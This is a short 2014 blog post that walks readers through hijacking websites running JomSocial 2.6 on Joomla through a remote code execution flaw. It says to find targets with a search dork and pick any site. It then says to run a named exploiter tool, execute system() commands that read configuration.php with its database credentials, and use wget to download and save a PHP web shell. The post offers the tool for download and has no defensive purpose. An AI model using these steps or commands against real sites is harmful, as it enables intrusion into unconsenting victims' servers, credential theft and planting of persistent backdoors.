Wednesday, 29 October 2014

[JOOMLA] JomSocial 2.6 Remote Code Execution

   1- Copy the dork and paste it on Google or any other search engine
   2- Chose any site
   3- Run the JomSocial Exploiter by Gothie
   4- Paste the site URL in the given textbox and click Connect
   5-If site is vulnerable, you will get the message as below

   6- Now, you can execute any command remotely. The commands are as below:
system('id & uname -a');
system('cat configuration.php');
    7- To upload shell, you need to have raw shell (shell.txt) uploaded anywhere and can be access directly without executing it. Type in the command below to import your shell and save it as .php
system('wget -O shell.php');
   8- Your shell can be found at

JomSocial Exploiter by Gothie (2.7MB)